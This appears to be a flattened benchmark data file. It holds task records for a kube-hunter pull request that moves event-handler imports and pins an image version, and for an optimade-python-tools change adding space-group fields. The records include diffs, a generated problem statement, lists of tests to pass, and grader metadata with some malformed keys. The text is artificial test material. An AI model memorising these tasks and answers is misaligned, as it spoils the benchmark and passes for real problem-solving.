AccessK8sDashboardTechnique, KubernetesCluster -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent diff --git a/kube_hunter/modules/hunting/etcd.py b/kube_hunter/modules/hunting/etcd.py index f087567..3a4dd6d 100644 --- a/kube_hunter/modules/hunting/etcd.py +++ b/kube_hunter/modules/hunting/etcd.py @@ -2,7 +2,7 @@ import logging import requests from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent from kube_hunter.core.types import ( ActiveHunter, diff --git a/kube_hunter/modules/hunting/kubelet.py b/kube_hunter/modules/hunting/kubelet.py index c67336c..6f9e8f6 100644 --- a/kube_hunter/modules/hunting/kubelet.py +++ b/kube_hunter/modules/hunting/kubelet.py @@ -9,7 +9,7 @@ import urllib3 import uuid from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure from kube_hunter.core.types import ( Hunter, diff --git a/kube_hunter/modules/hunting/mounts.py b/kube_hunter/modules/hunting/mounts.py index 8eb42d7..8714699 100644 --- a/kube_hunter/modules/hunting/mounts.py +++ b/kube_hunter/modules/hunting/mounts.py @@ -3,7 +3,7 @@ import re import uuid from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique from kube_hunter.modules.hunting.kubelet import ( diff --git 
a/kube_hunter/modules/hunting/proxy.py b/kube_hunter/modules/hunting/proxy.py index 0570d3d..ae417f8 100644 --- a/kube_hunter/modules/hunting/proxy.py +++ b/kube_hunter/modules/hunting/proxy.py @@ -4,7 +4,7 @@ import requests from enum import Enum from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure from kube_hunter.core.types import ( ActiveHunter, diff --git a/kube_hunter/modules/hunting/secrets.py b/kube_hunter/modules/hunting/secrets.py index 36e09d7..81d34bb 100644 --- a/kube_hunter/modules/hunting/secrets.py +++ b/kube_hunter/modules/hunting/secrets.py @@ -1,7 +1,7 @@ import logging import os -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import Vulnerability, Event from kube_hunter.core.types import Hunter, KubernetesCluster, AccessContainerServiceAccountTechnique from kube_hunter.modules.discovery.hosts import RunningAsPodEvent diff --git a/kube_hunter/modules/report/collector.py b/kube_hunter/modules/report/collector.py index 3843020..f601838 100644 --- a/kube_hunter/modules/report/collector.py +++ b/kube_hunter/modules/report/collector.py @@ -2,7 +2,7 @@ import logging import threading from kube_hunter.conf import get_config -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import ( Event, Service,
pin image version ## Description This pins the image version in the job manifest. Using this manifest directly (for example `kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-hunter/v0.6.7/job.yaml`) on a pinned version, will allow using that manifest without having to maintain your own, and allowing changes to this repo without breaking a pipeline. For example, using the job manifest now will fail because of #502 , and there's no previous manifest to refer to. ### Version tag discrepancy I've also upped the semver tagging in the GitHub actions to coincide with the `kube-bench` format (as well as the format in the tags of this repo). Using the job manifest now will fail, as it first needs to publish with the new tag format. This shouldn't impact any existing setups, as latest will stay as it is, and older tags will remain as they are. ### Other Also added label for the pod, and removed backofflimit to just use the default of 6. Cleaner and the same as `kube-bench`. ## Contribution Guidelines Please Read through the [Contribution Guidelines](https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md). ## Fixed Issues Did not make an issue. ## "BEFORE" and "AFTER" output No terminal output changes ## Contribution checklist - [x] I have read the Contributing Guidelines. - [ ] The commits refer to an active issue in the repository. - [ ] I have added automated testing to cover this case. ## Notes Please mention if you have not checked any of the above boxes.
**Title** Pin Kubernetes‑hunter image version and migrate event‑handler imports **Problem** - The job manifest referenced an un‑pinned container image, causing pipelines that apply the upstream manifest to break when the image tag changes. - The internal event‑handler module was moved but import paths throughout the codebase still pointed to the old location, leading to import errors and potential circular‑import issues. - The CI workflow used an outdated version of the Docker‑meta GitHub Action. **Root Cause** - Using a floating image tag and stale import paths left the repository mismatched with the released artifacts and the new module layout. **Fix / Expected Behavior** - The job manifest now references a specific version of the container image and includes a stable label, while relying on the default back‑off behavior. - All internal references to the event‑handler are updated to the new module path, and the package’s public interface reflects this change. - The publish workflow is switched to the current version of the Docker‑meta action, ensuring correct version tagging during releases. - Applying the upstream job manifest with `kubectl apply -f …/job.yaml` works reliably across releases without requiring local modifications. **Risk & Validation** - Verify that the updated manifest successfully creates a pod that runs the pinned image version. - Run the full test suite to confirm that the new import paths resolve correctly and no circular‑import errors appear. - Ensure the CI workflow completes and generates correctly versioned Docker images.
504
aquasecurity/kube-hunter
diff --git a/tests/core/test_handler.py b/tests/core/test_handler.py index 46baab5..3639505 100644 --- a/tests/core/test_handler.py +++ b/tests/core/test_handler.py @@ -4,7 +4,7 @@ from kube_hunter.conf import Config, set_config, get_config set_config(Config(active=True)) -from kube_hunter.core.events.handler import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.modules.discovery.apiserver import ApiServiceDiscovery from kube_hunter.modules.discovery.dashboard import KubeDashboard as KubeDashboardDiscovery from kube_hunter.modules.discovery.etcd import EtcdRemoteAccess as EtcdRemoteAccessDiscovery diff --git a/tests/core/test_subscribe.py b/tests/core/test_subscribe.py index 6dc0fc8..094eaeb 100644 --- a/tests/core/test_subscribe.py +++ b/tests/core/test_subscribe.py @@ -3,7 +3,7 @@ import time from kube_hunter.conf import Config, set_config from kube_hunter.core.types import Hunter from kube_hunter.core.events.types import Event, Service -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler counter = 0 first_run = True diff --git a/tests/discovery/test_apiserver.py b/tests/discovery/test_apiserver.py index dba49ea..83d4e98 100644 --- a/tests/discovery/test_apiserver.py +++ b/tests/discovery/test_apiserver.py @@ -8,7 +8,7 @@ set_config(Config()) from kube_hunter.modules.discovery.apiserver import ApiServer, ApiServiceDiscovery from kube_hunter.core.events.types import Event -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler counter = 0 diff --git a/tests/discovery/test_hosts.py b/tests/discovery/test_hosts.py index c9ce2a2..35fcd14 100644 --- a/tests/discovery/test_hosts.py +++ b/tests/discovery/test_hosts.py @@ -6,7 +6,7 @@ from kube_hunter.modules.discovery.hosts import ( HostDiscoveryHelpers, ) from kube_hunter.core.types import Hunter -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler 
import handler import json import requests_mock import pytest diff --git a/tests/hunting/test_apiserver_hunter.py b/tests/hunting/test_apiserver_hunter.py index 774d485..ff8c360 100644 --- a/tests/hunting/test_apiserver_hunter.py +++ b/tests/hunting/test_apiserver_hunter.py @@ -23,7 +23,7 @@ from kube_hunter.modules.hunting.apiserver import ApiServerPassiveHunterFinished from kube_hunter.modules.hunting.apiserver import CreateANamespace, DeleteANamespace from kube_hunter.modules.discovery.apiserver import ApiServer from kube_hunter.core.types import ExposedSensitiveInterfacesTechnique, AccessK8sApiServerTechnique -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler counter = 0 diff --git a/tests/hunting/test_certificates.py b/tests/hunting/test_certificates.py index 9697545..2edfdd2 100644 --- a/tests/hunting/test_certificates.py +++ b/tests/hunting/test_certificates.py @@ -5,7 +5,7 @@ set_config(Config()) from kube_hunter.core.events.types import Event from kube_hunter.modules.hunting.certificates import CertificateDiscovery, CertificateEmail -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler def test_CertificateDiscovery(): diff --git a/tests/hunting/test_cvehunting.py b/tests/hunting/test_cvehunting.py index df5047b..1a378ca 100644 --- a/tests/hunting/test_cvehunting.py +++ b/tests/hunting/test_cvehunting.py @@ -5,7 +5,7 @@ from kube_hunter.conf import Config, set_config set_config(Config()) -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.core.events.types import K8sVersionDisclosure from kube_hunter.modules.hunting.cves import ( K8sClusterCveHunter, diff --git a/tests/hunting/test_kubelet.py b/tests/hunting/test_kubelet.py index dcbce44..ed13955 100644 --- a/tests/hunting/test_kubelet.py +++ b/tests/hunting/test_kubelet.py @@ -3,7 +3,7 @@ import requests_mock import urllib.parse import 
uuid -from kube_hunter.core.events import handler +from kube_hunter.core.events.event_handler import handler from kube_hunter.modules.hunting.kubelet import ( AnonymousAuthEnabled, ExposedExistingPrivilegedContainersViaSecureKubeletPort,
[ "tests/core/test_handler.py::test_passive_hunters_registered", "tests/core/test_handler.py::test_active_hunters_registered", "tests/core/test_handler.py::test_all_hunters_registered", "tests/core/test_subscribe.py::test_subscribe_mechanism", "tests/core/test_subscribe.py::test_subscribe_once_mechanism", "tests/core/test_subscribe.py::test_subscribe_many_mechanism", "tests/discovery/test_apiserver.py::test_ApiServer", "tests/discovery/test_apiserver.py::test_ApiServerWithServiceAccountToken", "tests/discovery/test_apiserver.py::test_InsecureApiServer", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_azure_pod_request_fail", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_azure_pod_success", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v1_request_fail", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v1_success", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v2_request_fail", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_is_aws_pod_v2_success", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_execute_scan_cidr", "tests/discovery/test_hosts.py::TestFromPodHostDiscovery::test_execute_scan_remote", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_valid_cidr", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_valid_ignore", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_invalid_cidr", "tests/discovery/test_hosts.py::TestDiscoveryUtils::test_generate_hosts_invalid_ignore", "tests/hunting/test_apiserver_hunter.py::test_ApiServerToken", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServer", "tests/hunting/test_apiserver_hunter.py::test_AccessApiServerActive", "tests/hunting/test_certificates.py::test_CertificateDiscovery", "tests/hunting/test_cvehunting.py::TestCveUtils::test_is_downstream", 
"tests/hunting/test_cvehunting.py::TestCveUtils::test_ignore_downstream", "tests/hunting/test_kubelet.py::test_get_request_valid_url", "tests/hunting/test_kubelet.py::test_get_request_invalid_url", "tests/hunting/test_kubelet.py::test_post_request_valid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_valid_url_without_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_with_parameters", "tests/hunting/test_kubelet.py::test_post_request_invalid_url_without_parameters", "tests/hunting/test_kubelet.py::test_has_no_exception_result_with_exception", "tests/hunting/test_kubelet.py::test_has_no_exception_result_without_exception", "tests/hunting/test_kubelet.py::test_has_no_error_result_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_result_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_without_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_without_exception_and_with_error", "tests/hunting/test_kubelet.py::test_has_no_error_nor_exception_result_with_exception_and_with_error", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_privileged_setting", "tests/hunting/test_kubelet.py::test_proveanonymousauth_success_with_privileged_container_via_capabilities", "tests/hunting/test_kubelet.py::test_proveanonymousauth_connectivity_issues", "tests/hunting/test_kubelet.py::test_check_file_exists_existing_file", "tests/hunting/test_kubelet.py::test_check_file_exists_non_existent_file", "tests/hunting/test_kubelet.py::test_rm_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rm_command_removed_failed", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_success", 
"tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_touch", "tests/hunting/test_kubelet.py::test_attack_exposed_existing_privileged_container_failure_when_chmod", "tests/hunting/test_kubelet.py::test_check_directory_exists_existing_directory", "tests/hunting/test_kubelet.py::test_check_directory_exists_non_existent_directory", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_successfully", "tests/hunting/test_kubelet.py::test_rmdir_command_removed_failed", "tests/hunting/test_kubelet.py::test_get_root_values_success", "tests/hunting/test_kubelet.py::test_get_root_values_failure", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_success", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_cmdline", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_findfs", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mkdir", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_mount", "tests/hunting/test_kubelet.py::test_process_exposed_existing_privileged_container_failure_when_cat_hostname", "tests/hunting/test_kubelet.py::test_maliciousintentviasecurekubeletport_success" ]
[]
No new interfaces are introduced.
custom-check-github
{ "base_image_name": "python_base_310", "install": [ "pip install -q -r requirements-dev.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/core/test_handler.py tests/core/test_subscribe.py tests/discovery/test_apiserver.py tests/discovery/test_hosts.py tests/hunting/test_apiserver_hunter.py tests/hunting/test_certificates.py tests/hunting/test_cvehunting.py tests/hunting/test_kubelet.py" }
{ "num_modified_files": 26, "num_modified_lines": 30, "pr_author": "rhtenhove", "pr_labels": [], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/aquasecurity/kube-hunter/blob/main/CONTRIBUTING.md" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests pinning the Docker image version in job.yaml and updating the workflow, but the provided test patch only changes import paths across many test and source files, which is unrelated to the manifest change. The tests now expect a specific module name (event_handler) that the issue never mentioned, indicating an implicit naming requirement. This misalignment signals a B2 problem despite the issue’s intent being otherwise complete.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect import path 'kube_hunter.core.events.event_handler' instead of the original 'kube_hunter.core.events.handler', which is not mentioned in the issue." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
56450cb8eaaf37904c1f551aa926c94c1953135e
2025-03-03 20:16:35
codecov[bot]: ## [Codecov](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240?dropdown=coverage&src=pr&el=h1&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) Report All modified and coverable lines are covered by tests :white_check_mark: > Project coverage is 90.60%. Comparing base [(`56450cb`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/56450cb8eaaf37904c1f551aa926c94c1953135e?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) to head [(`7230e65`)](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/7230e6589f43db8d2e5e39f991253ef7691d5c46?dropdown=coverage&el=desc&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). <details><summary>Additional details and impacted files</summary> ```diff @@ Coverage Diff @@ ## main #2240 +/- ## ========================================== + Coverage 90.58% 90.60% +0.02% ========================================== Files 75 75 Lines 4917 4929 +12 ========================================== + Hits 4454 4466 +12 Misses 463 463 ``` | [Flag](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240/flags?src=pr&el=flags&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | Coverage Δ | | |---|---|---| | [project](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `90.60% <100.00%> (+0.02%)` | :arrow_up: | | 
[validator](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240/flags?src=pr&el=flag&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia) | `?` | | Flags with carried forward coverage won't be shown. [Click here](https://docs.codecov.io/docs/carryforward-flags?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia#carryforward-flags-in-the-pull-request-comment) to find out more. </details> [:umbrella: View full report in Codecov by Sentry](https://app.codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/2240?dropdown=coverage&src=pr&el=continue&utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia). :loudspeaker: Have feedback on the report? [Share it here](https://about.codecov.io/codecov-pr-comment-feedback/?utm_medium=referral&utm_source=github&utm_content=comment&utm_campaign=pr+comments&utm_term=Materials-Consortia).
materials-consortia__optimade-python-tools-2240
diff --git a/openapi/openapi.json b/openapi/openapi.json index 21a0b349..5a76f8e1 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -4371,6 +4371,68 @@ "x-optimade-queryable": "optional", "x-optimade-support": "optional" }, + "space_group_symbol_hall": { + "anyOf": [ + { + "type": "string" + }, + { + "type": "null" + } + ], + "title": "Space Group Symbol Hall", + "description": "A Hall space group symbol representing the symmetry of the structure as defined in (Hall, 1981, 1981a).\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The change-of-basis operations are used as defined in the International Tables of Crystallography (ITC) Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001).\n - Each component of the Hall symbol MUST be separated by a single space symbol.\n - If there exists a standard Hall symbol which represents the symmetry it SHOULD be used.\n - MUST be `null` if `nperiodic_dimensions` is not equal to 3.\n\n- **Examples**:\n - Space group symbols with explicit origin (the Hall symbols):\n - `P 2c -2ac`\n - `I 4bd 2ab 3`\n - Space group symbols with change-of-basis operations:\n - `P 2yb (-1/2*x+z,1/2*x,y)`\n - `-I 4 2 (1/2*x+1/2*y,-1/2*x+1/2*y,z)`\n\n- **Bibliographic References**:\n - Hall, S. R. (1981) Space-group notation with an explicit origin. Acta Crystallographica Section A, 37, 517-525, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001228\n - Hall, S. R. (1981a) Space-group notation with an explicit origin; erratum. Acta Crystallographica Section A, 37, 921-921, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001976\n - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. 
Dordrecht/Boston/London, Kluwer Academic Publishers.", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, + "space_group_symbol_hermann_mauguin": { + "anyOf": [ + { + "type": "string", + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$" + }, + { + "type": "null" + } + ], + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$", + "title": "Space Group Symbol Hermann Mauguin", + "description": "A human- and machine-readable string containing the short Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The H-M symbol SHOULD aim to convey the closest representation of the symmetry information that can be specified using the short format used in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1 as described in the accompanying text.\n - The symbol MAY be a non-standard short H-M symbol.\n - The H-M symbol does not unambiguously communicate the axis, cell, and origin choice, and the given symbol SHOULD NOT be amended to convey this information.\n - To encode as character strings, the following adaptations MUST be made when representing H-M symbols given in their typesetted form:\n - the overbar above the numbers MUST be changed to the minus sign in front of the digit (e.g. '-2');\n - subscripts that denote screw axes are written as digits immediately after the axis designator without a space (e.g. 'P 32')\n - the space group generators MUST be separated by a single space (e.g. 'P 21 21 2');\n - there MUST be no spaces in the space group generator designation (i.e. 
use 'P 21/m', not the 'P 21 / m');\n\n- **Examples**:\n - `C 2`\n - `P 21 21 21`\n\n- **Bibliographic References**:\n - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer.\n", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, + "space_group_symbol_hermann_mauguin_extended": { + "anyOf": [ + { + "type": "string", + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$" + }, + { + "type": "null" + } + ], + "pattern": "^(P|I|F|A|B|C|R)(\\s+\\d+|\\s+[a-z]+|\\s+\\d+/[a-z]+|\\s+\\d+/\\d+|\\s+-\\d*|\\s+\\d+/m|\\s+[a-z]+/m)*$", + "title": "Space Group Symbol Hermann Mauguin Extended", + "description": "A human- and machine-readable string containing the extended Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response.\n\n- **Type**: string\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The H-M symbols SHOULD be given as specified in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1.\n - The change-of-basis operation SHOULD be provided for the non-standard axis and cell choices.\n - The extended H-M symbol does not unambiguously communicate the origin choice, and the given symbol SHOULD NOT be amended to convey this information.\n - The description of the change-of-basis SHOULD follow conventions of the ITC Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001).\n - The same character string encoding conventions MUST be used as for the specification of the `space_group_symbol_hermann_mauguin` property.\n\n- **Examples**:\n - `C 1 2 1`\n\n- **Bibliographic References**:\n - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. 
Dordrecht/Boston/London, Kluwer Academic Publishers.\n - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer.\n\n", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, + "space_group_it_number": { + "anyOf": [ + { + "type": "integer", + "maximum": 230.0, + "minimum": 1.0 + }, + { + "type": "null" + } + ], + "title": "Space Group It Number", + "description": "Space group number which specifies the space group of the structure as defined in the International Tables for Crystallography Vol. A. (IUCr, 2005).\n\n- **Type**: integer\n\n- **Requirements/Conventions**:\n - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`.\n - **Query**: Support for queries on this property is OPTIONAL.\n - The integer value MUST be between 1 and 230.\n - MUST be null if `nperiodic_dimensions` is not equal to 3.", + "x-optimade-queryable": "optional", + "x-optimade-support": "optional" + }, "cartesian_site_positions": { "anyOf": [ { diff --git a/optimade/models/structures.py b/optimade/models/structures.py index c61770a8..773acead 100644 --- a/optimade/models/structures.py +++ b/optimade/models/structures.py @@ -11,6 +11,7 @@ from optimade.models.utils import ( ANONYMOUS_ELEMENTS, CHEMICAL_FORMULA_REGEXP, CHEMICAL_SYMBOLS, + HM_SYMBOL_REGEXP, OptimadeField, StrictField, SupportLevel, @@ -601,6 +602,119 @@ Note: the elements in this list each refer to the direction of the corresponding ), ] = None + space_group_symbol_hall: Annotated[ + str | None, + OptimadeField( + description="""A Hall space group symbol representing the symmetry of the structure as defined in (Hall, 1981, 1981a). + +- **Type**: string + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - **Query**: Support for queries on this property is OPTIONAL. 
+ - The change-of-basis operations are used as defined in the International Tables of Crystallography (ITC) Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001). + - Each component of the Hall symbol MUST be separated by a single space symbol. + - If there exists a standard Hall symbol which represents the symmetry it SHOULD be used. + - MUST be `null` if `nperiodic_dimensions` is not equal to 3. + +- **Examples**: + - Space group symbols with explicit origin (the Hall symbols): + - `P 2c -2ac` + - `I 4bd 2ab 3` + - Space group symbols with change-of-basis operations: + - `P 2yb (-1/2*x+z,1/2*x,y)` + - `-I 4 2 (1/2*x+1/2*y,-1/2*x+1/2*y,z)` + +- **Bibliographic References**: + - Hall, S. R. (1981) Space-group notation with an explicit origin. Acta Crystallographica Section A, 37, 517-525, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001228 + - Hall, S. R. (1981a) Space-group notation with an explicit origin; erratum. Acta Crystallographica Section A, 37, 921-921, International Union of Crystallography (IUCr), DOI: https://doi.org/10.1107/s0567739481001976 + - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. Dordrecht/Boston/London, Kluwer Academic Publishers.""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + ), + ] = None + + space_group_symbol_hermann_mauguin: Annotated[ + str | None, + OptimadeField( + description="""A human- and machine-readable string containing the short Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response. + +- **Type**: string + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - **Query**: Support for queries on this property is OPTIONAL. 
+ - The H-M symbol SHOULD aim to convey the closest representation of the symmetry information that can be specified using the short format used in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1 as described in the accompanying text. + - The symbol MAY be a non-standard short H-M symbol. + - The H-M symbol does not unambiguously communicate the axis, cell, and origin choice, and the given symbol SHOULD NOT be amended to convey this information. + - To encode as character strings, the following adaptations MUST be made when representing H-M symbols given in their typesetted form: + - the overbar above the numbers MUST be changed to the minus sign in front of the digit (e.g. '-2'); + - subscripts that denote screw axes are written as digits immediately after the axis designator without a space (e.g. 'P 32') + - the space group generators MUST be separated by a single space (e.g. 'P 21 21 2'); + - there MUST be no spaces in the space group generator designation (i.e. use 'P 21/m', not the 'P 21 / m'); + +- **Examples**: + - `C 2` + - `P 21 21 21` + +- **Bibliographic References**: + - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer. +""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + pattern=HM_SYMBOL_REGEXP, + ), + ] = None + + space_group_symbol_hermann_mauguin_extended: Annotated[ + str | None, + OptimadeField( + description="""A human- and machine-readable string containing the extended Hermann-Mauguin (H-M) symbol which specifies the space group of the structure in the response. + +- **Type**: string + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be `null`. + - **Query**: Support for queries on this property is OPTIONAL. + - The H-M symbols SHOULD be given as specified in the International Tables for Crystallography vol. A (IUCr, 2005), Table 4.3.2.1. 
+ - The change-of-basis operation SHOULD be provided for the non-standard axis and cell choices. + - The extended H-M symbol does not unambiguously communicate the origin choice, and the given symbol SHOULD NOT be amended to convey this information. + - The description of the change-of-basis SHOULD follow conventions of the ITC Vol. B, Sect. 1.4, Appendix A1.4.2 (IUCr, 2001). + - The same character string encoding conventions MUST be used as for the specification of the `space_group_symbol_hermann_mauguin` property. + +- **Examples**: + - `C 1 2 1` + +- **Bibliographic References**: + - IUCr (2001). International Tables for Crystallography vol. B. Reciprocal Space. Ed. U. Shmueli. 2-nd edition. Dordrecht/Boston/London, Kluwer Academic Publishers. + - IUCr (2005). International Tables for Crystallography vol. A. Space-Group Symmetry. Ed. Theo Hahn. 5-th edition. Dordrecht, Springer. + +""", + support=SupportLevel.OPTIONAL, + queryable=SupportLevel.OPTIONAL, + pattern=HM_SYMBOL_REGEXP, + ), + ] = None + + space_group_it_number: Annotated[ + int | None, + OptimadeField( + description="""Space group number which specifies the space group of the structure as defined in the International Tables for Crystallography Vol. A. (IUCr, 2005). + +- **Type**: integer + +- **Requirements/Conventions**: + - **Support**: OPTIONAL support in implementations, i.e., MAY be 